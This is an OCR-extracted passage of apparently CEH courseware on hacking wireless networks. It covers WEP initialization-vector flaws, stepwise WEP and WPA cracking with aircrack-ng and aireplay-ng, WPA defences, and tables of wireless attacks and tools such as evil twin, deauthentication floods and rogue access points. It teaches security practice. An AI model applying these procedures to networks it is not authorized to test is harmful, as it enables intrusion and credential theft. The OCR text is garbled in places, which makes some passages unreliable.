7. A lack of centralized key management makes it difficult to change W E P keys with any regularity 8. IV is a value that is used to randomize the key stream value and each packet has an IV value: e e The standard allows only 24 bits, which can be used within hours at a busy AP IV values can be reused

9. The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities: 6 A mechanism that depends on randomness is not random at all and attackers can easily figure out the key stream and decrypt other messages Since most companies have configured their stations and APs to use the same shared key, or the default four keys, the randomness of the key stream relies on the uniqueness of the IV value. The use of IV and a key ensures that the key stream for each packet is different, but in most cases the IV changes while the key remains constant. Since there are only two main components to this encryption process where one stays constant, the randomization of the process decreases to an unacceptable level. A busy access point can use all available IV values (224) within hours, which requires the reuse of IV values. Repetition in a process that relies on randomness ends up in futile efforts and non-worthy results. W hat makes the IV issue worse is that the 802.11 standard does not require each packet to have a different IV value, which is similar to having a "Beware of Dog" sign posted but only a Chihuahua to provide a barrier between intruders and the valued assets. In many implementations, the IV value only changes when the wireless NIC reinitializes, usually during a reboot, 24 bits for the IV value provide enough possible IV combination values, but most implementations use a handful of bits; thus not even utilizing all that is available to them.

Module 15 Page 2190

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W eak In itia liza tio n Vectors (IV)
In the RC4 algorithm, the Key Scheduling Algorithm (KSA) creates an IV based on the base key A flaw in the WEP implementation of RC4 allows "weak" IVs to be generated Those weak IVs reveal information about the key bytes they were derived from An attacker will collect enough weak IVs to reveal bytes of the base key

CEH
UrtrfW* ttfciul NMhM

m

The IV value is too short and not protected from reuse and no protection again message replay

The way the keystream is No effective detection constructed from the IV of message tampering makes it susceptible to weak (message integrity) key attacks (FMS attack)

It directly uses the master key and has no built-in provision to update the keys

Copyright © by EG-Gtlincil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e a k In it ia liz a t io n V e c to rs (IV s ) The following are the reasons that make the initialization vectors eeak: © In the RC4 algorithm, the Key Scheduling Algorithm (KSA) creates an IV based on the base key © The IV value is too short and not protected from reuse and no protection again message replay © A flaw in the W EP implementation of RC4 allows "weak" IVs to be generated © The way keys are constructed from the IV makes it susceptible to weak key attacks (9FMS attack) e © Those weak IVs reveal information about the key bytes they were derived from No effective detection of message tampering (message integrity)

© An attacker can collect enough weak IVs to reveal bytes of the base key © It directly uses the master key and has no built-in provision to update the keys

Module 15 Page 2191

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Break WEP E ncryption
Test the injection capability of the wireless device to the access point Start Wi-Fi sniffing tool such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs

(e d ifie d ttfcK jl H a th c f

C EH

Run a cracking tool such as Cain & Abel or aircrack-ng to extract encryption key from the IVs

]

g,
Use a tool such as aireplay-ng to do a fake authentication with the access point Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets

Start the wireless interface in monitor mode on the specific access point channel

Copyright © by EG-Gtnncil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w to B r e a k

W E P

E n c r y p tio n

&

Gathering lots of initialization vectors (IVs) is the necessary thing in order to break

the W EP encryption key. The attacker should gather sufficient IVs to crack the W EP key by simply listening to the network traffic and saving them. Injection can be used to speed up the IV gathering process. Injection allows capturing a large number of IVs in a short period of time. Captured IVs can be used to determine the W E P key. To break the W EP encryption the attacker should follow these steps: 9 Start the wireless interface in monitor mode on the specific access point channel In this step the attacker should turn the wireless interface into monitor mode. In monitor mode the interface can listen to every packet in the air. The attacker can select some packets for the injection by listening to every packet available in the air. Q Test the injection capability of the wireless device to the access point Here the attacker should test whether the wireless interface is within the range of the specified AP and also whether it is capable of injecting packets to it. 9 Use a tool such as aireplay-ng to do a fake authentication with the access point

Module 15 Page 2192

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Here the attacker should ensure that the source MAC address is already associated so that the injecting packet is accepted by the access point. The injection fails because of the lack of association with the access point. 9 Start Wi-Fi sniffing tool In this step the attacker should capture the IVs generated by making use of tools such as airodump-ng with a bssid filter to collect unique IVs. © Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets The attacker should aim at gaining a large number of IVs in a short period of time. This can be achieved by turning the aireplay-ng into ARP request replay mode which listens for ARP requests and then re-injects them back into the network. The AP usually rebroadcast the packets generating a new IV. So in order to gain large number of IVs the attacker should select ARP request mode. 9 Run a cracking tool such as Cain & Abel or aircrack‫־‬ng Using the cracking tools such as Cain & Abel, aircrack-ng the attacker can extract W EP encryption keys from the IVs.

Module 15 Page 2193

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to B reak WEP E ncryption
(C ont’d)

Cotifwd

C EH
itfcKjl NMhM

H o w to B r e a k W E P

E n c r y p tio n

( C o n t ’d )

1

i

W PA encryption is less exploitable when compared with W E P encryption. W PA/W AP2

can be cracked by capturing the right type of packets. Cracking can be done in offline and it needs to be near the AP for few moments. ^ W PA PSK It uses a user-defined password to initialize the TKIP, which is not crackable as it is a per-packet key but the keys can be brute-forced using dictionary attacks. A dictionary attack takes care of consumer passwords. O fflin e A tta c k To perform an offline attack, you only have to be near the AP for a matter of seconds in order to capture the W PA /W PA 2 authentication handshake. By capturing the right type of packets, W PA encryption keys can be cracked offline. In W PA handshake password is not actually sent across the network since typically the W PA handshake occurs over insecure channels and in plaintext. Capturing full authentication handshake from a real client and the AP helps in breaking the W PA/W PA2 encryption without any packet injection. D e - a u th e n tic a tio n A t t a c k

Module 15 Page 2194

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

To perform de-authentication attack in order to break the W P A encryption, you need a real, actively connected client. Force the connected client to disconnect, and then capture the reconnect and authentication packet using tools such as airplay, you should be able to reauthenticate in a few seconds then attempt to dictionary brute force the PMK. B ru te - F o rc e W P A K e y s Brute-force techniques can be used to break W PA /W PA 2 encryption keys. A bruteforce attack on W PA encryption keys can be performed by making use of a dictionary. Or it can be done by using tools such as aircrack, aireplay, or KisMac to brute force W PA keys. The impact of brute force on W A P encryption is substantial because of its compute intensive nature. Breaking the W PA keys through brute-force technique may take hours, days, or even weeks.

Module 15 Page 2195

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to D efend A gainst WPA Cracking
Passphrases
only way to crack WPA is to sniff the password PMK associated with the "handshake" authentication process, and if this password is extremely complicated, it will be almost impossible to crack

C EH

Passphrase Complexity
Select a random passphrase that is not made up of dictionary words Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals

Client Settings
Use WPA2 with AES/CCMP encryption only 9 Properly set the client settings (e.g. validate the server, specify server address, don't prompt for new servers, etc.)

Additional Controls
Use virtual-private-network (VPN) technology such as Remote Access VPN, Extranet VPN, Intranet VPN, etc. Implement a Network Access Control (NAC) or Network Access Protection (NAP) solution for additional control over end-user connectivity

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

H o w to D e f e n d A g a in s t W P A

C r a c k in g

&
cracking:

The following are the measures that can be taken to protect the network from W PA

P a ssp h ra se The only way to crack W P A is to sniff the password PM K associated with the "handshake" authentication process, and if this password is extremely complicated, it can be almost impossible to crack. Password can be made complicated by including a combination of numbers, upper and lowercase letters and symbols in phrase, and the length of the phrase should be as long as possible. P a s s p h r a s e C o m p le x ity To make the passphrase complex, select a random passphrase that is not made up of dictionary words. Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals. % A d d it io n a l C o n tr o ls Implementing additional controls over end-user connectivity helps in protecting the

Module 15 Page 2196

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

network from W P A cracking. Implement a Network Access Control (NAC) or Network Access Protection (NAP) solution for additional control over end-user connectivity. Use virtual-privatenetwork (VPN) technology such as a remote access VPN, an extranet VPN, an intranet VPN, etc. C lie n t S e ttin g s Use W PA 2 with AES/CCMP encryption only. Properly set the client settings (e.g., validate the server, specify server address, don't prompt for new servers, etc.).

Module 15 Page 2197

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

CE H

M o d u le F lo w So far, we have discussed various Wi-Fi concepts and wireless security mechanisms such as encryption algorithms. Now, we will discuss the security risk associated with wireless networks. This section covers various wireless threats and attacks such rogue access point attacks, client mis-association, denial of service attacks, etc.

(^S^)

Wireless Concepts

10 *

Wireless Encryption

W ireless Threats

W ireless Hacking Methodology

Wireless Hacking Tools

^

Bluetooth Hacking

Countermeasure

^ V ‫—׳‬

W ireless Security Tools

Module 15 Page 2198

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Pen Testing

Module 15 Page 2199

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wireless Threats: Access Control Attacks
J

EH

Wireless access control attacks aims to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls

War Driving

MAC Spoofing

Ad Hoc Associations

Client Mis-association

Rogue Access Points

AP Misconfiguration

Promiscuous Client

Unauthorized Association

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ir e le s s T h re a ts : A c c e s s C o n tr o l A tta c k s Wireless access control attacks aim to penetrate a network by evading wireless LAN access control measures, such as AP MAC filters and Wi-Fi port access controls. There are several kinds of access control attacks. The following are the types of access control attacks on wireless networks: W a r d r iv in g In a wardriving attack, wireless LANS are detected either by sending probe requests over a connection or by listening to web beacons. Once a penetration point is discovered, further attacks can be launched on the LAN. Some of the tools that can be used to perform wardriving are KisMAC, Netstumbler, and WaveStumber. R o g u e A c c e s s P o in ts

&

In order to create a backdoor into a trusted network, an unsecured access point or fake access point is installed inside a firewall. Any software or hardware access points

can be used to perform this kind of attack. M A C S p o o fin g Using the MAC spoofing technique, the attacker can reconfigure the MAC address to appear as an authorized access point to a host on a trusted network. The tools for

Module 15 Page 2200

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

carrying out this kind of attack are: changemac.sh, SMAC, and Wicontrol. A d H o c A s s o c ia tio n s ^ 9 This kind of attack can be carried out by using any USB adapter or wireless card. In this method, the host is connected to an unsecured station to attack a particular station or to avoid access point security. A P M is c o n fig u r a t io n If any of the critical security settings is improperly configured at any of the access points, the entire network could be open to vulnerabilities and attacks. The AP can't trigger alerts in most intrusion-detection systems, as it is authorized as a legitimate device on the network. C lie n t M is a s s o c ia tio n The client may connect or associate with an AP outside the legitimate network either intentionally or accidentally. This is because the W LAN signals travel through walls in the air. This kind of client misassociation thus can be lead to access control attacks. U n a u t h o r iz e d A s s o c ia t io n Unauthorized association is the major threat to wireless network. Prevention of this kind of attack depends on the method or technique that the attacker uses in order to get associated with the network. P r o m is c u o u s C lie n t The promiscuous client offers an irresistibly strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way the promiscuous client grabs the attention of the users towards it by sending strong signal.

Module 15 Page 2201

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless Threats: Integrity Attacks

C EH

r r In integrity attacks, attackers send forged control, management or data frames over a wireless j network to misdirect the wireless devices in order to perform another type of attack (e.g., DoS) J I____

1 Data Frame Injection ^ ♦ 5 Bit-Flipping Attacks ^
j j

2

3

4

*
k-

WEP Injection
j

4‫י‬
V

Data Replay

*
J

Initialization Vector Replay Attacks

6 ‫►י‬ ^ Extensible AP Replay
j

7 ‫►י‬ RADIUS Replay ‫►י‬

8 Wireless Network Viruses

Copyright © by EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ir e le s s T h re a ts : In t e g r it y A tta c k s In integrity attacks, attackers send forged control, management, or data frames over a wireless network to misdirect the wireless devices in order to perform another type of attack (e.g., DoS). Type of attack Description Method and Tools

D ata F ra m e In je c tio n

Crafting frames.

and

sending

forged

802.11

Airpwn, File2air, libradiate, v o id ll, W EPW edgie, wnet dinject/reinject

W E P In je c tio n

Crafting and sending encryption keys.

forged

W EP

W EP tools

cracking

+ injection

D ata R e p la y In itia liz a tio n V e c to r R e p la y A tta ck s

Capturing 802.11 data frames for later (modified) replay. The key stream is derived by sending the plain-text message.

Capture + injection tools

Module 15 Page 2202

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

B it- F lip p in g A tta ck s

Captures the frame and flips random bits in the data payload, modifies ICV, and sends to the user. Capturing Authentication 802.IX Protocols Extensible (e.g., EAP Wireless capture + injection tools between station and AP Ethernet capture + injection tools between AP and authentication server

E x te n s ib le A P R e p la y

Identity, Success, Failure) for later replay. Capturing RADIUS Access-Accept or

R A D IU S R e p la y

Reject messages for later replay Viruses have their impact on the wireless

W ir e le s s N e tw o rk V iru s e s

network to a great extent. It allows the attacker with simplest ways for attacking on APs. TABLE 15.6: Various types of integrity attacks with description and tools

Module 15 Page 2203

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wireless Threats: Confidentiality Attacks

Urtifwtf

C EH
ilhiul lUthM

These attacks attempt to intercept confidential information sent over wireless associations, whether sent in the clear text or encrypted by Wi-Fi protocols

Tv

W ir e le s s T h r e a ts : C o n fid e n tia lity A tta c k s These attacks attempt to intercept confidential information sent over wireless

associations, whether sent in the cleartext or encrypted by Wi-Fi protocols.

Type of attack

D e scrip tio n Capturing and decoding unprotected

M e th o d and T o o ls bsd-airtools, Ethereal, Ettercap, Kismet, commercial analyzers

E a v e s d ro p p in g

application traffic to obtain potentially sensitive information. Implication of information from the

T ra ffic A n a ly s is

observation of external traffic characteristics.

C ra ck in g W E P Key

Capturing data to recover a W EP key using brute force or Fluhrer-MantinShamir (FMS) cryptanalysis. Masquerading as an authorized AP by

Aircrack, AirSnort, chopchop, dwepcrack, WepAttack, WepDecrypt, WepLab cqureAP, HermesAP, HostAP, OpenAP, Quetec, WifiBSD

E v il T w in A P

beaconing the WLAN's service set identifier (SSID) to lure users.

Module 15 Page 2204

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Running traditional man-in-theMan-in-theM id d le A tta c k middle attack tools on an evil twin AP to intercept TCP sessions or SSL/SSH tunnels. Pretends to be an authorized user of a M a sq u e ra d in g system in order to gain access to it.

dsniff, Ettercap

Stealing passwords,

login

IDs

and

bypassing

authentication mechanisms Manipulating the network so the Sessio n H ija c k in g attacker's host appears to be the desired destination. Setting its service identifier (SSID) to H o n e y p o t Access P o in t be the same as an access point at the local hotspot assumes the attacker as the legitimate hotspot. TABLE 15.7: Various types of confidentiality attacks with description and tools Manipulating SSID Manipulating

Module 15 Page 2205

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

-

W ireless Threats: A vailability Attacks

CEH

Denial of Service attacks aim to prevent legitimate users from accessing resources in a wireless network A v a ila b ility A ttacks

‫י‬

Access Point Theft

E

Denial of Service

Authenticate Flood ARP Cache Poisoning Attack Power Saving Attacks

Disassociation Attacks

De-authenticate Flood

EAP-Failure

Routing Attacks

II

TKIP M MIC Exploit

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

)

W ir e le s s T h re a ts : A v a ila b ilit y A tta c k s These attacks aim at obstructing the delivery of wireless services to legitimate users,

either by crippling those resources or by denying them access to WLAN resources. There are many attacks using which an attacker can obstruct the availability of wireless networks. The availability attacks include:

Type of Attack Access Point Theft

Description Physically removing an AP from a public space. Exploiting the CSMA/CA Clear Channel Assessment (CCA) mechanism to make a channel appear busy. Generating thousands of counterfeit 802.11 beacons to make it hard for stations to find a legitimate AP. Sending forged Authenticates or

Method and Tools Five finger discount

Denial of Service

An adapter that supports CW Tx mode, with a low-level utility to invoke continuous transmit

Beacon Flood

FakeAP

Authenticate Flood

Airjack, File2air, Macfld, vo id ll

Module 15 Page 2206

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Associates from random MACs to fill a target AP's association table. Disassociation Attacks Causes the target unavailable to other wireless devices by destroying the connectivity between station and the client. Flooding station(s) with forged Deauthenticates or Disassociates to disconnecting users from an AP. Generating invalid TKIP data to exceed the target AP's MIC error threshold, suspending WLAN service. Provides attackers with many attack vectors. Observing a valid 802.IX EAP exchange, and then sending the station a forged EAP-Failure message. Routing information is distributed within the network. Transmitting a spoofed TIM or DTIM to the client while in power saving mode causes the DoS attack.
TABLE 15.8: Various types of availability attacks

Destroys the connectivity

De‫־‬authenticate Flood

Airjack, Omerta, voidll

TKIP MIC Exploit

File2air, wnet dinject

ARP Cache Poisoning Attack EAP-Failure

QACafe, File2air, libradiate

Routing Attacks Power Saving Attacks

RIP protocol

Module 15 Page 2207

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless Threats: Authentication Attacks

CEH

■ I The objective of authentication attacks is to steal the identity of Wi-Fi clients, their personal information, login credentials, etc. to gain unauthorized access to network resources

PSK Cracking

Identity Theft

LEAP Cracking

Shared Key Guessing

VPN Login Cracking

Password Speculation

Domain Login Cracking

Application Login Theft

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Threats: Authentication Attacks
The objective of authentication attacks is to steal the identity of Wi-Fi clients, their personal information, login credentials, etc. to gain unauthorized access to network resources.

Type of Attack Application Login Theft

Description Capturing user credentials (e.g., email address and password) from cleartext application protocols. Recovering a WPA PSK from captured key handshake frames using a dictionary attack tool. Attempting 802.11 Shared Key Authentication with guessed vendor default or cracked WEP keys. Recovering user credentials (e.g., Windows login and password) by cracking NetBIOS password hashes, using a brute-force or dictionary attack tool.

Method and Tools Ace Password Sniffer, Dsniff, PHoss, WinSniffer coWPAtty, KisMAC, wpa_crack, wpa-psk‫־‬bf WEP cracking tools

PSK Cracking

Shared Key Guessing

Domain Login Cracking

John the Ripper, LOphtCrack, Cain

Module 15 Page 2208

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Identity Theft VPN Login Cracking

Capturing user identities from cleartext 802.IX Identity Response packets. Recovering user credentials (e.g., PPTP password or IPSec Preshared Secret Key) by running brute-force attacks on VPN authentication protocols. Using a captured identity, repeatedly attempting 802.IX authentication to guess the user's password. Recovering user credentials from captured 802.IX Lightweight EAP (LEAP) packets using a dictionary attack tool to crack the NT password hash.
TABLE 15.9: Various types of authentication attacks

Capture tools ike_scan and ike_crack (IPsec), anger and THC-pptpbruter (PPTP) Password dictionary

Password Speculation

LEAP Cracking

Anwrap, Asleap, THCLEAPcracker

Module 15 Page 2209

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

R o g u e

A c c e s s

P o in t A t t a c k

C E H

User Connecting

t cgit Com pany W i-Fi N etw o rk SSID: juggyboy Wi-Fi Channel: 6

Rogue wireless access point placed into an 802.11 network can be used to hijack the connections of legitimate network users

When the user turns on the computer, the rogue wireless access point will offer to connect with the network user's NIC

All the traffic the user enters will pass through the rogue access point, thus enabling a form of wireless packet sniffing

Copyright © b y

EG-G*nncil. All

Rights Reserved. Reproduction is Strictly Prohibited.

©

Rogue Access Point Attack

£= H K— ■ 802.11 allows wireless access points to connect to the NICs by authenticating with the help of service set identifiers (SSIDs). Unauthorized access points can allow anyone with an 802.11-equipped device onto the corporate network, which puts a potential attacker close to the mission-critical resources. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. The attacker can then create his or her own rogue access point and place it near the target corporate network. Rogue wireless access point placed into an 802.11 network can be used to hijack the connections of legitimate network users. When the user turns on the computer, the rogue wireless access point will offer to connect with the network user's NIC. The attacker lures the user to connect to the rogue access point by sending his/her SSID. If the user connects to the rogue access point considering it as a legitimate AP, all the traffic the user enters will pass through the rogue access point, thus enabling a form of wireless packet sniffing. The sniffed packets may even contain username and passwords.

Module 15 Page 2210

Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

:it C o m p any Wi-Fi N e tw o rk
User Connecting to Rogue Access Point

SSID: juggyboy Wi-Fi Channel: 6

My ‫ סולל‬is
ju g g y b o y

connect to me A tt.u k.‫־‬r

FIGURE 15.15: Attacker performing Rogue Access Point Attack

Module 15 Page 2211

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

C lie n t M is - a s s o c ia t io n
Control Room

CEH

Storage

Client Mis-association Air Traffic Controller SSID: juggyboy

J

Attacker sets up a rogue access point outside the corporate perim eter and lures the em ployees of the organization to connect with it

J

O n c e a ss o c ia ted , e m p lo y e e s m ay b y p a ss th e e n te rp ris e s e c u rity policies

Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

C lient Mis-association
An attacker set up a rogue access point outside the corporate perimeter and lures the employees of the organization to connect with it. This can be potentially used as a channel by the attacker to bypass enterprise security policies. Once a Wi-Fi client connects to the rogue access point, an attacker can steal the sensitive information such as user names and passwords by launching man-in-the-middle kind of attacks.

Module 15 Page 2212

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Control Room

M a in te n a n ce

Storage

Client Mis-association
A ir Traffic C o ntroller S S ID : juggyboy

Attacker in the Neighboring Network

FIGURE 15.16: Client Mis-association

Module 15 Page 2213

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M isconfigured A ccess Point Attack

U rtllM

c EH
itkKJl

M isconfigured Access Point Attack
Most organizations spend significant amounts of time defining and implementing WiFi security policies, but it may possible that the client of the wireless network may change the security setting on AP unintentionally; this in turn may lead to misconfigurations in access points. A misconfigured AP can expose a well-secured network to attacks. Attackers can easily connect to the secured network through misconfigured access points. The following are the elements that play an important role in this kind of attack: 9 9 SSID Broadcast: Access points are configured to broadcast SSIDs to authorized users Weak Password: To verify authorized users, network administrators incorrectly use the SSIDs as passwords Configuration Error: SSID broadcasting is a configuration error that assists intruders in stealing an SSID and has the AP assume they are allowed to connect

9

Module 15 Page 2214

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.17: Attacker performing Misconfigured Access Point Attack

Module 15 Page 2215

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

U n a u t h o r iz e d

A s s o c ia t io n
enabling Trojan

C E H
Urti*W itkHil lUckw

A c c o u n t in g

Department

Stock Holding 2 Production House

Soft access points are client cards or embedded WLAN radios in some PDAs and laptops that can be launched inadvertently or through a virus program

Attackers infect victinVs machine and activate soft APs allowing them 1 unauthorized connection to the enterprise network

1

Attacker connect to enterprise network through soft APs instead of the actual Access Points

1

Attacker

Copyright © b y

EG-C*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

Unauthorized Association
Unauthorized association is a major threat to the wireless network. This may be one of two kinds: accidental association or malicious association. Malicious association is accomplished with the help of soft APs. Attackers use soft APs to gain access to the target wireless network. Software access points are client cards or embedded WLAN radios in some PDAs and laptops that can be launched inadvertently or through a virus program. Attackers infect the victim's machine and activate soft Aps, allowing them unauthorized connection to the enterprise network. Attackers connect to an enterprise network through soft APs instead of the actual access points.

‫ב‬

Module 15 Page 2216

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.18: Unauthorized association threat in wireless networks

Module 15 Page 2217

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A d

H o c

C o n n e c t io n

A t t a c k

Hotel Wi-Fi N etw o rk

Lounge

o
W i- Fi clients com m unicate directly via an ad hoc m ode that do not require an A P to relay packets

e
Ad hoc m ode is inherently insecure and does not provide strong au thentication and encryption

0
Thus attackers can easily connect to and com prom ise the enterprise client operating in ad hoc mode

Attacker

/Copyright © b y EC - C M IC il. All Rights R e s e n / e i Reproduction is Strictly Probfbited.

Ad Hoc Connection Attack
b ‫י‬- 1 ‫ י־‬Wi-Fi clients communicate directly via an ad hoc mode that does not require an AP to relay packets. The networks that are connected in ad hoc mode share information across the clients conveniently. To share audio/video content with others, most Wi-Fi users use ad hoc networks. Sometimes the networks are forced to enable ad hoc mode by the resources that can be accessed only in ad hoc mode, but this mode is inherently insecure and does not provide strong authentication and encryption. Thus, attackers can easily connect to and compromise the enterprise client operating in ad hoc mode.

Module 15 Page 2218

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Hotel Wi-Fi Network

Lounge

Attacker

FIGURE 15.19: Attacker compromising the enterprise client using Ad Hoc Connection Attack

Module 15 Page 2219

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H oneySpot A c c e ss P oint Attack

CEH

Attacker

Attacker traps victims by using fake hotspots

Copyright © b y

EG-G(nncil. All

Rights Reserved. Reproduction is Strictly Prohibited.

HoneySpot Access Point Attack
r>

, . . Users can connect to any available network in case of multiple WLANs co-existing in the same space. This kind of multiple WLAN is more exploitable by attacks. The attackers can set up an unauthorized wireless network by operating an access point in the region of multiple WLANs and can allow the users of the authorized networks to get connected to it. These APs mounted by the attacker are called "honeypot" APs. These APs transmit a stronger beacon signal. Usually wireless network cards look for strong signals for access. Hence, an authorized user may connect to this malicious honeypot AP; this creates a security vulnerability and sends the sensitive information of the user such as identity, user name, and password to the attacker.

Module 15 Page 2220

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Attacker

Attacker traps victims by using fake hotspots

FIGURE 15.20: HoneySpot Access Point Attack process

Module 15 Page 2221

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A P

M A C

S p o o fin g

8 Hacker spoofs the MAC address of WLAN client equipment to mask as an authorized client 6 Attacker connects to AP as an authorized client and eavesdrop on sensitive information

Device with MAC address: 00-0C-F1-56-98-AD Production Department
O n ly c o m p u te r fr o m p ro d u ctio n

Accounting Department

Reception •it• n /ft

d e p a r t m e n t can c o n n e c t to m e
